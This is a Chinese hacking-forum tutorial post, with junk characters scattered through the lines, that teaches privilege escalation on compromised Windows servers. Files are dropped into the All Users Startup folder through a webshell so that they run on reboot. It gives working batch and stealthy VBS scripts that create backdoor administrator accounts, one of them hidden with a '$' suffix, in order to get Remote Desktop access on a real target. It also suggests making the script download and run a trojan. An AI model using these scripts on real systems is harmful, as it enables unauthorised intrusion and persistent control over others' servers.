- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是& j3 B+ o3 d" L/ X# |, x
启动 提权
) m- n( f: V6 V JC:\Docume~1\All Users\「开始」菜单\程序\启动7 y' [7 f$ q* i, a- {
在这里必须有写入权限 否则此方法无效6 d* |/ r; b7 e. E, b
因为我是在网吧 这里显示不了路径1 U5 G1 k5 o, Q* N
我去服务器上演示给大家看. k) t0 f4 [! c( j" r e
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
) }* r/ ~2 N* W& i. ~8 f文件 从而运行我们的文件
* {. h8 }4 d% _/ s8 Z- S/ K+ H这里有两中方式 第一种是批处理
2 Q1 y2 x* S- a% I我们来看下目前 我机器上的用户组
6 p3 }) `- i8 a% }) {' m目前我们没有521这个用户
$ _8 c8 L0 y q+ _. v9 ?' n看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
, G4 e3 C9 E: z. D* }4 D1 r大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
$ s ?( K+ O9 \! i! d0 Z+ p下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
3 J) C; ^6 O' _2 F; b大家看 已经成功加入了WMMY用户
5 }/ P$ f9 R: G7 l网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了( M. L" t- @7 L% z- A. z
当前终端服务端口: 3389( _ M2 J5 I% S/ w# u) D# G( I
系统自动登录功能未开启
* Q. @# u" y/ ?5 n3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了6 ^- W) d% D7 E% b5 ~0 U$ j) U
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径) E) N8 I% [" u+ D' A
第一种隐蔽性太差 我们就用第二种吧6 ]3 Z$ T7 l, n9 B6 ]
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去+ m& ?8 M$ ~5 X
从而取得了3389的登陆权限; ^! F$ D+ M/ Y- R% l/ v
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马6 l1 o( }1 `) `" O4 ?
基本原理都差不多 我就不多介绍了, M) b# {4 t+ g: H+ d/ K
教程结束```
+ \3 M3 i9 d% b! q2 S* R& I2 Y@echo off+ ?/ P$ s6 Z; ^5 [% W
net user 521 521 /add" W- r3 C, ?' T/ S/ f( U/ F/ Y7 g
net localgroup administrators 521 /add
5 a# p- G& j8 R x! U9 {& A
0 J' d& M+ R5 |. P: A! W& U; [* O/ A- con Error Resume next* E% D/ k# `& D3 {" Z9 r9 ^: D
set wshshell=createobject("wscript.shell")
+ N' B9 Y9 Q' N2 N% r; ya=wshshell.run("net user wmmy$ 1227 /add",0)! k5 Q9 l) x4 Y! i2 n
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
$ d3 b' z0 `+ N( q# e4 y
8 X5 `% H6 ?2 c! q6 y
4 d- b6 X; m+ R* A6 J点击下载
5 {$ r' y* X! d8 E |
-
2
评分人数
-
|